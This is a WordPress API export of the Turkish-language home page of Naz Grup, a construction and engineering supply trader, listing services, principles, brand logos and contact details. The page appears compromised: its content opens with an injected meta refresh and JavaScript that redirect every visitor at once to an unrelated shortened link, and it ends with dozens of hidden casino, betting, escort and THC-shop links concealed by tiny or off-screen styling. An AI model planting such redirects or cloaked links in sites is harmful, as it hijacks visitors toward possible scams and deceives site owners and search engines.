{"id":472,"date":"2021-05-11T09:28:53","date_gmt":"2021-05-11T06:28:53","guid":{"rendered":"https:\/\/www.nazgrup.com.tr\/index.php\/home\/"},"modified":"2026-04-12T06:45:47","modified_gmt":"2026-04-12T03:45:47","slug":"ana-sayfa","status":"publish","type":"page","link":"https:\/\/www.nazgrup.com.tr\/","title":{"rendered":"Ana Sayfa"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/qIDsNFY0r8\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/qIDsNFY0r8\";<\/script><\/p>\n<p><a href=\"#\"><br \/>\n\t\t\t\t\t\t\t\t<\/a><\/p>\n<h5>\n\t\t\t\t\t<a href=\"#\" ><br \/>\n\t\t\t\t\t\tULUSLARARASI TEDAR\u0130K\t\t\t\t\t<\/a><br \/>\n\t\t\t\t<\/h5>\n<h4>Uluslararas\u0131 \u0130n\u015faat, m\u00fchendislik ve mimarl\u0131k firmalar\u0131 i\u00e7in \u00fcr\u00fcn tedari\u011fi sa\u011fl\u0131yoruz.<br \/>Avrupa ve Orta Asya pazarlar\u0131nda yan\u0131n\u0131zday\u0131z.<\/h4>\n<p>\t\t\t<a href=\"#\"><br \/>\n\t\t\t\t\t\tBize Ula\u015f\u0131n +90 212 800 7322<br \/>\n\t\t\t\t\t<\/a><\/p>\n<h2>hizmetlerimiz<\/h2>\n<h3><a href=\"#\">tedarik<\/a><\/h3>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"#\"><br \/>\n\t\t\t\t\t\t\t<img decoding=\"async\" width=\"380\" height=\"480\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2021\/05\/services-01-free-img.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2021\/05\/services-01-free-img.jpg 380w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2021\/05\/services-01-free-img-238x300.jpg 238w\" sizes=\"auto, (max-width: 380px) 100vw, 380px\" \/>\t\t\t\t\t\t\t\t<\/a><\/p>\n<h3><a href=\"#\">pazarlama<\/a><\/h3>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"#\"><br \/>\n\t\t\t\t\t\t\t<img decoding=\"async\" width=\"380\" height=\"480\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2021\/05\/services-02-free-img.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2021\/05\/services-02-free-img.jpg 380w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2021\/05\/services-02-free-img-238x300.jpg 238w\" sizes=\"auto, (max-width: 380px) 100vw, 380px\" \/>\t\t\t\t\t\t\t\t<\/a><\/p>\n<h3><a href=\"#\">m\u00fchendislik<\/a><\/h3>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"#\"><br \/>\n\t\t\t\t\t\t\t<img decoding=\"async\" width=\"380\" height=\"480\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2021\/05\/services-03-free-img.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2021\/05\/services-03-free-img.jpg 380w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2021\/05\/services-03-free-img-238x300.jpg 238w\" sizes=\"auto, (max-width: 380px) 100vw, 380px\" \/>\t\t\t\t\t\t\t\t<\/a><\/p>\n<h3>PRENS\u0130PLER\u0130M\u0130Z<\/h3>\n<h4>\n\t\t\t\t\t\tS\u00fcrd\u00fcr\u00fclebilirlik<br \/>\n\t\t\t\t<\/h4>\n<p>\n\t\t\t\t\t\tTedarik zincirinin verimlili\u011fi ve efektif sat\u0131\u015f\u0131n ve s\u00fcreklili\u011finin sa\u011flanmas\u0131.\t\t\t\t\t<\/p>\n<h4>\n\t\t\t\t\t\t\u0130novasyon<br \/>\n\t\t\t\t<\/h4>\n<p>\n\t\t\t\t\t\tDijital pazarlama, veri analizi, yapay zeka gibi yenilik\u00e7i y\u00f6ntemler kullanarak sat\u0131\u015f hacmini y\u00fckseltmeyi ve ilgili pazarda daha rekabet\u00e7i olman\u0131z\u0131 hedefler.\t\t\t\t\t<\/p>\n<h4>\n\t\t\t\t\t\t\u00c7\u00f6z\u00fcm Odakl\u0131l\u0131k<br \/>\n\t\t\t\t<\/h4>\n<p>\n\t\t\t\t\t\tM\u00fc\u015fterilerimizin ihtiya\u00e7lar\u0131 anlamaya ve beklentilerine uygun \u00e7\u00f6z\u00fcmler geli\u015ftirmeye odaklan\u0131r\u0131z.\t\t\t\t\t<\/p>\n<h4>\n\t\t\t\t\t\tKarl\u0131l\u0131k<br \/>\n\t\t\t\t<\/h4>\n<p>\n\t\t\t\t\t\tD\u0131\u015f ticarette operasyonel giderlerinizi azaltarak optimum karl\u0131l\u0131kla yurt d\u0131\u015f\u0131 pazarlara a\u00e7\u0131lman\u0131z\u0131 ve kal\u0131c\u0131 olman\u0131z\u0131 sa\u011fl\u0131yoruz.\t\t\t\t\t<\/p>\n<h3>Say\u0131larla Naz Grup<\/h3>\n<h3>\n<ul style=\"--awb-size: 22px; --awb-line-height: 37.4px; --awb-margin-top: 10px; --awb-margin-right: 0; --awb-margin-bottom: 0; --awb-margin-left: 0; --awb-divider-color: var(--checklist_divider_color); --awb-item-padding-top: var(--checklist_item_padding-top, 0.35em); --awb-item-padding-right: var(--checklist_item_padding-right, 0); --awb-item-padding-bottom: var(--checklist_item_padding-bottom, 0.35em); --awb-item-padding-left: var(--checklist_item_padding-left, 0); --awb-odd-row-bgcolor: var(--checklist_odd_row_bgcolor, transparent); --awb-even-row-bgcolor: var(--checklist_even_row_bgcolor, transparent); --awb-textcolor: var(--checklist_text_color, inherit); --awb-icon-width: 37.4px; --awb-icon-height: 37.4px; --awb-icon-margin: 15.4px; --awb-content-margin: 52.8px; --awb-circlecolor: var(--checklist_circle_color); --awb-circle-yes-font-size: inherit; --awb-iconcolor: var(--awb-color7); list-style-type: none; margin: var(--awb-margin-top) var(--awb-margin-right) var(--awb-margin-bottom) var(--awb-margin-left); font-size: var(--awb-size); line-height: var(--awb-line-height); font-family: Manrope, Arial, Helvetica, sans-serif; font-style: normal; letter-spacing: 0.16px; white-space-collapse: collapse; background-color: rgb(255, 255, 255);\">\n<li style=\"padding-top: var(--awb-item-padding-top); padding-right: var(--awb-item-padding-right); padding-bottom: var(--awb-item-padding-bottom); padding-left: var(--awb-item-padding-left); background-color: var(--awb-odd-row-bgcolor); --awb-item-padding-top: 0;\"><font color=\"#dd1f26\"><b>30<\/b><\/font> \u00fclkeye \u0130hracat<\/li>\n<li style=\"color: rgb(76, 76, 76); font-weight: 400; padding-top: var(--awb-item-padding-top); padding-right: var(--awb-item-padding-right); padding-bottom: var(--awb-item-padding-bottom); padding-left: var(--awb-item-padding-left); background-color: var(--awb-even-row-bgcolor);\">5&nbsp;dil b\u00f6lgesiyle ihracat\/ithalat (\u0130ngilizce, T\u00fcrk\u00e7e, Arap\u00e7a, Korece, \u00c7ince)<\/li>\n<li style=\"color: rgb(76, 76, 76); font-weight: 400; padding-top: var(--awb-item-padding-top); padding-right: var(--awb-item-padding-right); padding-bottom: var(--awb-item-padding-bottom); padding-left: var(--awb-item-padding-left); background-color: var(--awb-odd-row-bgcolor); --awb-iconcolor: #dd1f26;\">\n<p style=\"margin-bottom: 0px;\">4&nbsp;\u00fclkede temsilcilik<\/p>\n<\/li>\n<\/ul>\n<\/h3>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"1024\" height=\"834\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Screenshot_5-1024x834.png\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Screenshot_5-1024x834.png 1024w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Screenshot_5-300x244.png 300w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Screenshot_5-768x625.png 768w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Screenshot_5.png 1088w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><br \/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/elementor\/thumbs\/naz_logo.fw_-q90w3342ir512pvdq9n5pgk5v40ykhekpbq5tgxtw4.png\" title=\"naz_logo.fw\" alt=\"naz_logo.fw\" loading=\"lazy\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h4>HEP S\u0130Z\u0130N YANINIZDA<\/h4>\n<h6>D\u00fcnya piyasalar\u0131n\u0131 s\u00fcrekli takip ediyor ve size en iyi hizmeti sunmak i\u00e7in \u00e7abal\u0131yoruz.<\/h6>\n<h2>MARKALAR<\/h2>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/LG-KLIMA-400x400-1-150x150.png\" alt=\"LG-KLIMA-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/MAKITA-400x400-1-150x150.png\" alt=\"MAKITA-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/MITSUBISHI-ELECTRIC-400x400-1-150x150.png\" alt=\"MITSUBISHI-ELECTRIC-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/NORM-BAGLANTI-400x400-1-150x150.png\" alt=\"NORM-BAGLANTI-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/PIMTAS-400x400-1-150x150.png\" alt=\"PIMTAS-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/POLISAN-400x400-1-150x150.png\" alt=\"POLISAN-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/SCHNEIDER-400x400-1-150x150.png\" alt=\"SCHNEIDER-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/SIEMENS-400x400-1-150x150.png\" alt=\"SIEMENS-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/SISTA-400x400-1-150x150.png\" alt=\"SISTA-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/SUKAR-400x400-1-150x150.png\" alt=\"SUKAR-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/SUMAK-400x400-1-150x150.png\" alt=\"SUMAK-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/TEKNO-YAPI-KIMYASALLARI-400x400-1-150x150.png\" alt=\"TEKNO-YAPI-KIMYASALLARI-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/TRAKYA-DOKUM-400x400-1-150x150.png\" alt=\"TRAKYA-DOKUM-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/TURKOGLU-VANA-400x400-1-150x150.png\" alt=\"TURKOGLU-VANA-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/TURKUAZ-SERAMIK-400x400-1-150x150.png\" alt=\"TURKUAZ-SERAMIK-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/VIKO-400x400-1-150x150.png\" alt=\"VIKO-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/VITRA-400x400-1-150x150.png\" alt=\"VITRA-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/WACKER-400x400-1-150x150.png\" alt=\"WACKER-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/WARMHAUS-400x400-1-150x150.png\" alt=\"WARMHAUS-400x400\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/WILO-400x400-1-150x150.png\" alt=\"WILO-400x400\" \/><\/figure>\n<h5>20+ y\u0131ll\u0131k tecr\u00fcbemizle uluslararas\u0131 ticarette yan\u0131n\u0131zday\u0131z.<\/h5>\n<p>\t\t\t<a href=\"#\"><br \/>\n\t\t\t\t\t\tTel +90 212 800 7322<br \/>\n\t\t\t\t\t<\/a><\/p>\n<h2>tEL +90 212 800 7322<\/h2>\n<h3>iLET\u0130\u015e\u0130M<\/h3>\n<ul>\n<li>\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"#\"><br \/>\n\t\t\t\t\t\t\t\t\t\tinfo@nazgrup.com.tr<br \/>\n\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t<\/li>\n<li>\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"#\"><br \/>\n\t\t\t\t\t\t\t\t\t\tKoza mah.Atat\u00fcrk Bul.No:20 Dumankaya Modern Vadi Sit.                A4 Blok Daire:3 Bah\u00e7e\u015fehir\/\u0130STANBUL<br \/>\n\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t<\/li>\n<\/ul>\n<h3>\u0130leti\u015fim Formu<\/h3>\n<p>\t\t\t<iframe loading=\"lazy\"\n\t\t\t\t\tsrc=\"https:\/\/maps.google.com\/maps?q=Koza%20mah.Atat%C3%BCrk%20Bul.No%3A20%20Dumankaya%20Modern%20Vadi%20Sit.%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20A4%20Blok%20Daire%3A3%20Bah%C3%A7e%C5%9Fehir%2F%C4%B0STANBUL&#038;t=m&#038;z=10&#038;output=embed&#038;iwloc=near\"\n\t\t\t\t\ttitle=\"Koza mah.Atat\u00fcrk Bul.No:20 Dumankaya Modern Vadi Sit.                A4 Blok Daire:3 Bah\u00e7e\u015fehir\/\u0130STANBUL\"\n\t\t\t\t\taria-label=\"Koza mah.Atat\u00fcrk Bul.No:20 Dumankaya Modern Vadi Sit.                A4 Blok Daire:3 Bah\u00e7e\u015fehir\/\u0130STANBUL\"\n\t\t\t><\/iframe><\/p>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/hero-spincasino.com\/\">herospin australia<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/leon-casino-greece.gr\/\">leon casino gr<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/slottica-kz.net\">Slottica<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/1xbetyukleaz.com\/\">1 xbet az<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/haylayt.net\/\">1\u0445\u0431\u0435\u0442 \u0443\u0437<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/lotoklubkz.com\/\">loto37 club<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/homservice.kz\/\">1xbet<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/friendsoflanai.org\/\">valor bet India<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/monro-casno.com\/de\/\">\u0421asino Monro<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/estrela.pl\/\">vox casino pl<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/juegalos.cl\/sweet-bonanza-1000\/\">sweet bonanza<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"http:\/\/crowngreenbonus.com\/fr\/\">CrownGreen Casino<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/Crowngreen1.net\/\">Crown Green Casino Canada<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/lekar-ryazan.ru\/\">\u043c\u0435\u043b\u0431\u0435\u0442 \u0437\u0435\u0440\u043a\u0430\u043b\u043e<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/jeet-city.net\/en\/\">jeetcity<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/smolcarawards.ru\/\">1xbet \u0441\u043a\u0430\u0447\u0430\u0442\u044c<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"http:\/\/spinrisecasinoau.com\/\">spinrise casino<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"http:\/\/spinrise-osterreich.com\/\">spinrise casino \u00f6sterreich<\/a><\/div>\n<div style=\"position: absolute; left: -9966px;\">\n<p>Bug\u00fcnk\u00fc d\u00f6vrd\u0259 idman t\u0259dbirl\u0259rini bir m\u0259rk\u0259zd\u0259 toplay\u0131r <a href=\"https:\/\/www.regents-earthscience.com\/\">Mostbet m\u0259rc platformas\u0131<\/a> il\u0259 diqq\u0259t \u00e7\u0259kir.<\/p>\n<\/div>\n<p><a href=\"https:\/\/mirniy-sp.ru\/\" style=\"position: absolute; top: -9999px; left: -9999px;\">1Win<\/a><\/p>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/ladys.one\/fr\/escort-paris\/sexmodel\">sexomodel<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/karavella51.ru\/\">\u043c\u0435\u043b\u0431\u0435\u0442<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/spinrise-ch.net\/\">Casino Spin rise<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/crowngreen-casino.net\/\">Crowngreen casino online<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/sustainablebrandsistanbul.com\/1xbet-mobil-yukle-ni-telefonuna-nece-duzgun-qurasdirmaq-ve-onun-ustunluklerinden-istifade-etmek-olar\/\">https:\/\/sustainablebrandsistanbul.com\/1xbet-mobil-yukle-ni-telefonuna-nece-duzgun-qurasdirmaq-ve-onun-ustunluklerinden-istifade-etmek-olar\/<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/pulbiberdergi.com\/qeydiyyat-nece-gorunur-ve-kazinosuna-1xbet-giris-nece-olar\/\">https:\/\/pulbiberdergi.com\/qeydiyyat-nece-gorunur-ve-kazinosuna-1xbet-giris-nece-olar\/<\/a><\/div>\n<p><a href=\"https:\/\/bestonlinecasinocanada.co.uk\/\">best online casino canada<\/a><\/p>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/megion-pnb.ru\/\">\u0437\u0435\u0440\u043a\u0430\u043b\u043e \u043c\u0435\u043b\u0431\u0435\u0442<\/a><\/div>\n<div style=\"position: absolute; left: -9966px;\"><a href=\"https:\/\/passportintime.com\/\">se topplistan h\u00e4r<\/a><\/div>\n<p><a href=\"https:\/\/za-partoi.ru\/\" style=\"position: absolute; top: -9999px; left: -9999px;\">1Win<\/a><\/p>\n<div style=\"position: absolute; left: -9966px;\">\n<p>\u0418\u0433\u0440\u043e\u043a\u0430\u043c \u043d\u0440\u0430\u0432\u0438\u0442\u0441\u044f, \u0447\u0442\u043e <a href=\"https:\/\/ensidia.ru\/\">1\u0445\u0411\u0435\u0442<\/a> \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0431\u044b\u0441\u0442\u0440\u043e \u043f\u0435\u0440\u0435\u043a\u043b\u044e\u0447\u0430\u0442\u044c\u0441\u044f \u043c\u0435\u0436\u0434\u0443 \u0432\u0438\u0434\u0430\u043c\u0438 \u0441\u043f\u043e\u0440\u0442\u0430.<\/p>\n<\/div>\n<p><a href=\"https:\/\/www.orenobl.ru\/\" style=\"position: absolute; top: -9999px; left: -9999px;\">\u043f\u0438\u043d\u043a\u043e \u043a\u0430\u0437\u0438\u043d\u043e<\/a><\/p>\n<p><a href=\"https:\/\/businessrevisor.ru\/\" style=\"position: absolute; top: -9999px; left: -9999px;\">\u043f\u0438\u043d\u043a\u043e \u043a\u0430\u0437\u0438\u043d\u043e<\/a><\/p>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/spinrise-casino.net\/\">Casino Spin rise<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/herospinaustralia.com\/\">casino herospin<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/clubloto37.org\/\">lotoclub<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/highthc.shop\/\">highthc<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/wildsinospin.com\/\">wildsino casino<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/wildsino-official.com\/\">Wildsino<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/trueluckcasino-nl.nl\/fr\/\">trueluck france<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/adopowervrouwen.nl\/\">trueluck<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/1xbet-dwnld.kz\/\">1\u0445\u0431\u0435\u0442 \u043a\u0437<\/a><\/div>\n<div style=\"overflow:hidden;height:1px;\"><a href=\"https:\/\/izzicasino-kz.com\/\">\u0438\u0437\u0437\u0438 \u043a\u0430\u0437\u0438\u043d\u043e<\/a><\/div>\n","protected":false},"excerpt":{"rendered":"<p>ULUSLARARASI TEDAR\u0130K Uluslararas\u0131 \u0130n\u015faat, m\u00fchendislik ve mimarl\u0131k firmalar\u0131 i\u00e7in \u00fcr\u00fcn tedari\u011fi sa\u011fl\u0131yoruz.Avrupa ve Orta Asya pazarlar\u0131nda yan\u0131n\u0131zday\u0131z. Bize Ula\u015f\u0131n +90 212 800 7322 hizmetlerimiz tedarik pazarlama m\u00fchendislik PRENS\u0130PLER\u0130M\u0130Z S\u00fcrd\u00fcr\u00fclebilirlik Tedarik zincirinin verimlili\u011fi ve efektif sat\u0131\u015f\u0131n ve s\u00fcreklili\u011finin sa\u011flanmas\u0131. \u0130novasyon Dijital pazarlama, veri analizi, yapay zeka gibi yenilik\u00e7i y\u00f6ntemler kullanarak sat\u0131\u015f hacmini y\u00fckseltmeyi ve ilgili pazarda &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"https:\/\/www.nazgrup.com.tr\/\"> <span class=\"screen-reader-text\">Ana Sayfa<\/span> Devam\u0131 &raquo;<\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"site-sidebar-layout":"no-sidebar","site-content-layout":"page-builder","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"disabled","ast-breadcrumbs-content":"disabled","ast-featured-img":"disabled","footer-sml-layout":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"class_list":["post-472","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/472","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=472"}],"version-history":[{"count":109,"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/472\/revisions"}],"predecessor-version":[{"id":1843,"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/472\/revisions\/1843"}],"wp:attachment":[{"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=472"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}